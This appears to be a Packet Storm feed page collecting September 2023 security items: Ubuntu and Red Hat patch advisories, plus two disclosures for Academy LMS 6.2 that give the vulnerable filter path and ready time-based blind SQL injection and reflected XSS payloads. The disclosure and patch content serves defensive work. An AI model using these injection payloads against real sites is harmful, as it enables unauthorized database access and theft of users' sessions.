Ubuntu Security Notice 6374-1 - It was discovered that Mutt incorrectly handled certain email header content. If a user were tricked into opening a specially crafted message, a remote attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6374-1  
September 14, 2023

mutt vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Mutt could be made to crash if it received specially crafted  
input.

Software Description:  
- mutt: text-based mailreader supporting MIME, GPG, PGP and threading

Details:

It was discovered that Mutt incorrectly handled certain email header  
content. If a user were tricked into opening a specially crafted message,  
a remote attacker could possibly use this issue to cause a denial of  
service. (CVE-2023-4874, CVE-2023-4875)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   mutt                            2.2.9-1ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   mutt                            2.1.4-1ubuntu1.2

Ubuntu 20.04 LTS:  
   mutt                            1.13.2-1ubuntu0.6

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   mutt                            1.9.4-3ubuntu0.6+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   mutt                            1.5.24-1ubuntu0.6+esm3  
   mutt-patched                    1.5.24-1ubuntu0.6+esm3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6374-1  
   CVE-2023-4874, CVE-2023-4875

Package Information:  
   https://launchpad.net/ubuntu/+source/mutt/2.2.9-1ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/mutt/2.1.4-1ubuntu1.2  
   https://launchpad.net/ubuntu/+source/mutt/1.13.2-1ubuntu0.6

Ubuntu Security Notice USN-6374-1

Ubuntu Security Notice 6373-1 - It was discovered that gawk could be made to read out of bounds when processing certain inputs. If a user or an automated system were tricked into opening a specially crafted input, an attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6373-1  
September 14, 2023

gawk vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

gawk could be made to crash if it received specially crafted  
input.

Software Description:  
- gawk: GNU awk, a pattern scanning and processing language

Details:

It was discovered that gawk could be made to read out of bounds when  
processing certain inputs. If a user or an automated system were tricked  
into opening a specially crafted input, an attacker could possibly use  
this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   gawk                            1:5.1.0-1ubuntu0.1

Ubuntu 20.04 LTS:  
   gawk                            1:5.0.1+dfsg-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   gawk                            1:4.1.4+dfsg-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   gawk                            1:4.1.3+dfsg-0.1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   gawk                            1:4.0.1+dfsg-2.1ubuntu2+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6373-1  
   CVE-2023-4156

Package Information:  
   https://launchpad.net/ubuntu/+source/gawk/1:5.1.0-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/gawk/1:5.0.1+dfsg-1ubuntu0.1

Ubuntu Security Notice USN-6373-1

Academy LMS version 6.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Academy LMS 6.2 - SQL Injection# Exploit Author: CraCkEr# Date: 29/08/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4974# CWE: CWE-89 / CWE-74 / CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /academy/tutor/filterGET parameter 'price_min' is vulnerable to SQL InjectionGET parameter 'price_max' is vulnerable to SQL Injectionhttps://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0---Parameter: price_min (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0Parameter: price_max (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0---[-] Done

Academy LMS 6.2 SQL Injection

Academy LMS version 6.2 suffers from a cross site scripting vulnerability.

    # Exploit Title: Academy LMS 6.2 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/08/2023# Vendor: Creativeitem# Vendor Homepage: https://creativeitem.com/# Software Link: https://demo.creativeitem.com/academy/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4973# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /academy/tutor/filterGET parameter 'searched_word' is vulnerable to XSSGET parameter 'searched_tution_class_type[]' is vulnerable to XSSGET parameter 'searched_price_type[]' is vulnerable to XSSGET parameter 'searched_duration[]' is vulnerable to XSShttps://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]XSS Payload:acoa5"><script>alert(1)</script>dyzs0[-] Done

Academy LMS 6.2 Cross Site Scripting

Red Hat Security Advisory 2023-5175-01 - Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation. Issues addressed include a memory leak vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Service Mesh 2.2.10 security update  
Advisory ID:       RHSA-2023:5175-01  
Product:           Red Hat OpenShift Service Mesh  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5175  
Issue date:        2023-09-14  
CVE Names:         CVE-2016-3709 CVE-2020-24736 CVE-2023-1667   
                   CVE-2023-2283 CVE-2023-2602 CVE-2023-2603   
                   CVE-2023-3899 CVE-2023-26604 CVE-2023-27536   
                   CVE-2023-28321 CVE-2023-28484 CVE-2023-29469   
                   CVE-2023-32681 CVE-2023-34969 CVE-2023-35941   
                   CVE-2023-35944 CVE-2023-35945   
=====================================================================

1. Summary:

Red Hat OpenShift Service Mesh 2.2.10

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio  
service mesh project, tailored for installation into an OpenShift Container  
Platform installation.

Security Fix(es):

* envoy: OAuth2 credentials exploit with permanent validity  
(CVE-2023-35941)

* envoy: Incorrect handling of HTTP requests and responses with mixed case  
schemes (CVE-2023-35944)

* envoy: HTTP/2 memory leak in nghttp2 codec (CVE-2023-35945)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2217977 - CVE-2023-35941 envoy: OAuth2 credentials exploit with permanent validity  
2217983 - CVE-2023-35945 envoy: HTTP/2 memory leak in nghttp2 codec  
2217985 - CVE-2023-35944 envoy: Incorrect handling of HTTP requests and responses with mixed case schemes

5. JIRA issues fixed (https://issues.redhat.com/):

OSSM-4799 - Kiali base-image update for OSSM 2.2.10

6. References:

https://access.redhat.com/security/cve/CVE-2016-3709  
https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-2602  
https://access.redhat.com/security/cve/CVE-2023-2603  
https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27536  
https://access.redhat.com/security/cve/CVE-2023-28321  
https://access.redhat.com/security/cve/CVE-2023-28484  
https://access.redhat.com/security/cve/CVE-2023-29469  
https://access.redhat.com/security/cve/CVE-2023-32681  
https://access.redhat.com/security/cve/CVE-2023-34969  
https://access.redhat.com/security/cve/CVE-2023-35941  
https://access.redhat.com/security/cve/CVE-2023-35944  
https://access.redhat.com/security/cve/CVE-2023-35945  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlA3q2AAoJENzjgjWX9erEdf0P/3QfCq+SJQ9z3HnMKY/9rgTo  
c2cyIMdt0PZYwcd7jAdJ1Cad0g3Oevh8bDEYhmrvtV8nitGiryhJavjA+BDFP5NF  
rSqRH9j2Tsp6OYvPCgHAM31A7FAQWSSBmaoCaad47qsmRGM2pyOoppxTJe7Nck2/  
MU/m3eSRjHxeoZiEVsdc6O6KYiTbHuPlhoCRUzTC5DnNDPwEDMMt0XGPAeBhe75q  
x4rFe0CkOpNyGhrGlpioUedajBluU0LpiqDOKoGU5ZkRlg7x2+2D5q9R7M2qaDUM  
1PuQ/EJZewzk9BINio1YDU7xZIJ9CzKDS0NhqxZ/8scenGpVLrX4CVC3FAM4SzfY  
tSkYn27WgwvyuTeioth8MdbMS4GOuUl4ebstlzVeD6zeqqvzSinA6tPz2LbAuyru  
8rBad7xQPVuazWSBXzzlnbguM1t19vcinvAzU9SQtKvCwnQa4CYCzIO6KKaaG/Y7  
f6s2pfMfyQlgTMLGE96xABUMK4G06IhlY78hcYCg+gmmU5q4JrLOCIV2IG7a/qZ0  
52Mv3hHE0Orzn46bLjL0RLdGxyW8r+XpXHfyO3IoEATuygR1vxFpvCZHfPatbUwq  
mWEOLRiCxq1RmXfjzPJlkNl/NCqNFwrGwZm0YrhPXSl1Ib9vo98wkqP2Eo2NuM2F  
cSSMp7PgsLR/wqjocz1A  
=SNT2  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5175-01

Red Hat Security Advisory 2023-5174-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Service Mesh Containers for 2.4.3 security update  
Advisory ID:       RHSA-2023:5174-01  
Product:           Red Hat OpenShift Service Mesh  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5174  
Issue date:        2023-09-14  
CVE Names:         CVE-2016-3709 CVE-2023-2602 CVE-2023-2603   
                   CVE-2023-2828 CVE-2023-3899 CVE-2023-27536   
                   CVE-2023-28321 CVE-2023-28484 CVE-2023-29469   
                   CVE-2023-32681 CVE-2023-34969 CVE-2023-35942   
=====================================================================

1. Summary:

Red Hat OpenShift Service Mesh Containers for 2.4.3

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio  
service mesh project, tailored for installation into an on-premise  
OpenShift Container Platform installation.

This advisory covers container images for the release.

Security Fix(es):

* envoy: gRPC access log crash caused by the listener draining  
(CVE-2023-35942)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2217978 - CVE-2023-35942 envoy: gRPC access log crash caused by the listener draining

5. JIRA issues fixed (https://issues.redhat.com/):

OSSM-1182 - Deliver ARM images for OSSM Operator for Developer Preview  
OSSM-3508 - Ensure Cluster Ingress Operator can create cluster-wide SMCP  
OSSM-3979 - Implement envoyExtAuthzGrpc extension provider  
OSSM-4247 - Service details of ServiceEntry fails  
OSSM-4461 - Add FIPS annotation setting to kiali operator metadata   
OSSM-4491 - Add missing configuration options to meshConfig.extensionProviders.envoyExtAuthzHttp  
OSSM-4559 - Panic in conversion of extensionProviders.envoyExtAuthzHttp  
OSSM-4627 - Add option to disable the GatewayClass controller  
OSSM-4705 - Removing subset in config - Fails to save

6. References:

https://access.redhat.com/security/cve/CVE-2016-3709  
https://access.redhat.com/security/cve/CVE-2023-2602  
https://access.redhat.com/security/cve/CVE-2023-2603  
https://access.redhat.com/security/cve/CVE-2023-2828  
https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/cve/CVE-2023-27536  
https://access.redhat.com/security/cve/CVE-2023-28321  
https://access.redhat.com/security/cve/CVE-2023-28484  
https://access.redhat.com/security/cve/CVE-2023-29469  
https://access.redhat.com/security/cve/CVE-2023-32681  
https://access.redhat.com/security/cve/CVE-2023-34969  
https://access.redhat.com/security/cve/CVE-2023-35942  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlA3quAAoJENzjgjWX9erEOOwQAJh30YjH0YDaZEftcPJRqVbJ  
IADT5p6J5WzGXJWullXoDcenfW1HXdV5mHlQdfGcWq33miW3vROfugDLWj841Nsd  
VOwQYypoNEOVLeAvnNX64oVOM/A8HOfDN4UmdLEhvF4GXdpjMI+ac93KX8EJ+IRN  
WCNflP75ZVneBZB7yfFnbxRHzkqH/HQNHDC687t0EC0q2h3R5vxPBuLEhCQSZzKw  
BgcmuT1thD3f5laYNue+axLby/+MGuW5/pEY8S0JEiZnGxisT6Ey4cSPodZ5zrSK  
nnCc9oVXc8flc3yCk0icd/KT7O4dlnzALyX43F4z5sNeiAJbJLdlVnMX+9tk5dG9  
InLOrfgBGhzD40xVMEKSWLglRIcccUDCJKVFDXX85pf0/oonNq7I/kxsq6aMdxG+  
VT5TvFPWmbEDBP+6uckcDro3rvXHbo4qDTems97mkUlBAhpKpIXsxKmGC8fnRViG  
+LExxiP7d9bAzxZ3CJ4e1xb4b1lA5MPjf4WJFPVnb9He8cbcJWaemt6DjN/5iCXa  
PX5NtAQDicBXX0A0I0mIL8HhqQY/jXpVj1XeW5gD3IBpQ7jT76LDEidk+CFRl3Q1  
86lKuSfGYyczK+J2hR69KMfusaEy6DHBmp08ksUFY3Uw47WG+2WEOC/1jullIf0W  
j0Uaqj6CDOV+pu2LYVOe  
=EENm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5174-01

Ubuntu Security Notice 6372-1 - It was discovered that DBus incorrectly handled certain invalid messages. A local attacker could possibly use this issue to cause DBus to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6372-1September 14, 2023dbus vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:DBus could be made to crash if it received a specially crafted request.Software Description:- dbus: simple interprocess messaging systemDetails:It was discovered that DBus incorrectly handled certaininvalid messages. A local attacker could possibly usethis issue to cause DBus to crash, resulting in a denialof service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 LTS (Available with Ubuntu Pro):   dbus                               1.10.6-1ubuntu3.6+esm3   libdbus-1-3                     1.10.6-1ubuntu3.6+esm3After a standard system update you need to reboot your computer to makeall the necessary changes.References:   https://ubuntu.com/security/notices/USN-6372-1   CVE-2023-34969

Ubuntu Security Notice USN-6372-1

Ubuntu Security Notice 6371-1 - It was discovered that libssh2 incorrectly handled memory access. An attacker could possibly use this issue to cause a crash.

==========================================================================  
Ubuntu Security Notice USN-6371-1  
September 14, 2023

libssh2 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

libssh2 could be made to crash if it received specially  
crafted network traffic.

Software Description:  
- libssh2: Client-side C library implementing the SSH2 protocol

Details:

It was discovered that libssh2 incorrectly handled memory  
access. An attacker could possibly use this issue to cause  
a crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   libssh2-1                       1.8.0-2.1ubuntu0.1

Ubuntu 18.04 LTS:  
   libssh2-1                       1.8.0-1ubuntu0.1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libssh2-1                       1.5.0-2ubuntu0.1+esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   libssh2-1                       1.4.3-2ubuntu0.2+esm3

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6371-1  
   CVE-2020-22218

Package Information:  
   https://launchpad.net/ubuntu/+source/libssh2/1.8.0-2.1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/libssh2/1.8.0-1ubuntu0.1

Ubuntu Security Notice USN-6371-1

Red Hat Security Advisory 2023-5165-01 - Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. Issues addressed include code execution, denial of service, deserialization, and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat AMQ Streams 2.5.0 release and security update  
Advisory ID:       RHSA-2023:5165-01  
Product:           Red Hat AMQ Streams  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5165  
Issue date:        2023-09-14  
CVE Names:         CVE-2021-37136 CVE-2021-37137 CVE-2022-1471   
                   CVE-2022-24823 CVE-2022-36944 CVE-2023-0482   
                   CVE-2023-2976 CVE-2023-3635 CVE-2023-26048   
                   CVE-2023-26049 CVE-2023-33201 CVE-2023-34453   
                   CVE-2023-34454 CVE-2023-34455 CVE-2023-34462   
=====================================================================

1. Summary:

Red Hat AMQ Streams 2.5.0 is now available from the Red Hat Customer  
Portal.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a  
distributed backbone that allows microservices and other applications to  
share data with extremely high throughput and extremely low latency.

Security Fix(es):

* snakeyaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

 * scala: deserialization gadget chain (CVE-2022-36944)

* DoS of the Okio client when handling a crafted GZIP archive  
(CVE-2023-3635)

 * netty-codec: Bzip2Decoder doesn't allow setting size restrictions for  
decompressed data (CVE-2021-37136)

* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may  
buffer skippable chunks in an unnecessary way (CVE-2021-37137)

* netty: world readable temporary file containing sensitive data  
(CVE-2022-24823)

* guava: insecure temporary directory creation (CVE-2023-2976)

* Jetty servlets with multipart support may cause OOM error with client  
requests (CVE-2023-26048)

* Nonstandard cookie parsing in Jetty may allow an attacker to smuggle  
cookies within other cookies (CVE-2023-26049)

* bouncycastle: potential blind LDAP injection attack using a self-signed  
certificate (CVE-2023-33201)

* snappy-java: Integer overflow in shuffle leads to DoS (CVE-2023-34453)

* snappy-java: Integer overflow in compress leads to DoS (CVE-2023-34454)

* snappy-java: Unchecked chunk length leads to DoS (CVE-2023-34455)

* Flaw in Netty's SniHandler while navigating TLS handshake; DoS  
(CVE-2023-34462)

* RESTEasy: creation of insecure temp files (CVE-2023-0482)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link (you must  
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data  
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way  
2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data  
2129809 - CVE-2022-36944 scala: deserialization gadget chain  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution  
2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files  
2215229 - CVE-2023-2976 guava: insecure temporary directory creation  
2215393 - CVE-2023-34453 snappy-java: Integer overflow in shuffle leads to DoS  
2215394 - CVE-2023-34454 snappy-java: Integer overflow in compress leads to DoS  
2215445 - CVE-2023-34455 snappy-java: Unchecked chunk length leads to DoS  
2215465 - CVE-2023-33201 bouncycastle: potential  blind LDAP injection attack using a self-signed certificate  
2216888 - CVE-2023-34462 netty: SniHandler 16MB allocation leads to OOM  
2229295 - CVE-2023-3635 okio: GzipSource class improper exception handling  
2236340 - CVE-2023-26048 jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter()  
2236341 - CVE-2023-26049 jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies

5. JIRA issues fixed (https://issues.redhat.com/):

ENTMQST-5081 - [PROD] Create RHSA erratum for Streams 2.5.0

6. References:

https://access.redhat.com/security/cve/CVE-2021-37136  
https://access.redhat.com/security/cve/CVE-2021-37137  
https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-24823  
https://access.redhat.com/security/cve/CVE-2022-36944  
https://access.redhat.com/security/cve/CVE-2023-0482  
https://access.redhat.com/security/cve/CVE-2023-2976  
https://access.redhat.com/security/cve/CVE-2023-3635  
https://access.redhat.com/security/cve/CVE-2023-26048  
https://access.redhat.com/security/cve/CVE-2023-26049  
https://access.redhat.com/security/cve/CVE-2023-33201  
https://access.redhat.com/security/cve/CVE-2023-34453  
https://access.redhat.com/security/cve/CVE-2023-34454  
https://access.redhat.com/security/cve/CVE-2023-34455  
https://access.redhat.com/security/cve/CVE-2023-34462  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.streams&version=2.5.0  
https://access.redhat.com/documentation/en-us/red_hat_amq_streams/2.5

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlAyZSAAoJENzjgjWX9erEmRwQAIr30XliBoykJhsrfof3/YM7  
dmC4a5RLefsM62tkqRzbQuEpMuD/sC7ODRe415g49vP3iwzj9siV+vN9wHR2+4uB  
QivzIH+Ka2A7p7YoCpBrHqytibI7ZRQTyHvOLvTxm43VQ/m4G3PevdHs5q6gvUFS  
JawbpjWQ3XbgfXe9JB0lgFxrLE+Xjqf8fkXWHRcJ42uW+4MA+1vVUnET28U4rHEh  
qqX+BzcYL7Rx/CpxRj6ewAHRID59z2HsUgp+yNflb4hLqe+ByCyl169DlTMTMAvX  
pYqthRb8EXx2MIGkInyz9GsRL5vnm684tZFYW62hgQKO1JQNF4dBxuQArDl9SNFm  
P+zLfV7ShhhrSkEnBg81yVeRPkbFF/3oOurCxhWTsdb0ZUXHhY4EcOmJklPGTzg4  
CSp86UrXE9XUGzTHnMc2/AUVDvhq6pqUj550UbdK5ijaEkuuTXUOkreqvb5DM1PS  
4WbLJxcBsZEOYEzSflzA6cy5rLt7VLONIu8IoBNyrjbaY62UTOYXwtwb2pnL3BX0  
ClCmxhawvrlhmVXupapG7X9FBNqTo1VqCMImLaGH5zvL9fOFbUOmsr4tpnAdy0dN  
aqs7PftCiWcqTt+85nOzEaKGorWo45VIjomdLX0FDPLnIL5oLefr8eL0xOYYXeQa  
dnMwz+Rga4GUk26e29q0  
=V0cF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5165-01

Red Hat Security Advisory 2023-5170-01 - This release of Red Hat build of Quarkus 2.13.8 includes security updates, bug fixes, and enhancements. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat build of Quarkus 2.13.8 release and security update  
Advisory ID:       RHSA-2023:5170-01  
Product:           Red Hat build of Quarkus  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5170  
Issue date:        2023-09-14  
CVE Names:         CVE-2023-4853   
=====================================================================

1. Summary:

An update is now available for Red Hat build of Quarkus. Red Hat Product  
Security has rated this update as having a security impact of Important. A  
Common Vulnerability Scoring System (CVSS) base score, which gives a  
detailed severity rating, is available for each vulnerability. For more  
information, see the CVE links in the References section.

2. Description:

This release of Red Hat build of Quarkus 2.13.8 includes security updates,  
bug fixes, and enhancements. For more information, see the release notes  
page listed in the References section.

Security Fixes:

* CVE-2023-4853 quarkus-http: quarkus: HTTP security policy bypass  
[quarkus-2.13]

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2238034 - CVE-2023-4853 quarkus: HTTP security policy bypass

5. References:

https://access.redhat.com/security/cve/CVE-2023-4853  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlAyZNAAoJENzjgjWX9erEHr8P/itG6Q4VoXk3hcKNNTOvX3c2  
li4ZZe3DPXAetvHB3vQQ40XS4xj8A9dgbgTQN+s+iWy86MomdFny4EgqcF4a2jjV  
Flf2X4qQoyP8hdRai3pnxwt0obk+ppsIl+W9e2vHwQjvcsa5FATHrzfNEbgDLNAB  
Mxz62PB7+FWVfSUfL3iJwubZnuTlKeue6+ZRYbeS2ZuTgg0bvRuOKLdJLXfsrlzG  
OO573SxHVUAZxnr2ksy+DyechbbI1VC4ZdyVQPJxYCrWEaFFW8yBXYwYiYvyRYRT  
J48jegHDtrVbs/dH5fFHOC1B4PkOWucWw4jDlavsP00vrYkFc/2K4JaJ/IHzJEn4  
WmAxWBWBSPMGeRoyitwq4IrlKmy75eDIWIj4LJVCae7bzyxaPbwLL2TzJqCUTFS5  
v3IS1ko2eyD3oBY4s9m0MCjP2KhWWRuO5iwj1a4Yp1FStgL68KU/EyaM50kQ7xvN  
VIecXPoxBqttfcJZr2ajnHs5A9FuSBRgA0kzzMyBuMbjljp5nZrzz4u3l/weO3RB  
x4f9FbL3mnwNll4iByqX1ggvGMGGuUFJvgAKy/sCMfseoctvmNmYm6mrjm/AXFm8  
PCG9pt2sdNPHc80AytMa6lpq8yORnllL+4ZX2KgwgO7y3QepOqU/ooevleHyW9/E  
6Yn1S7KvFUZfdM0gRstw  
=/zBa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm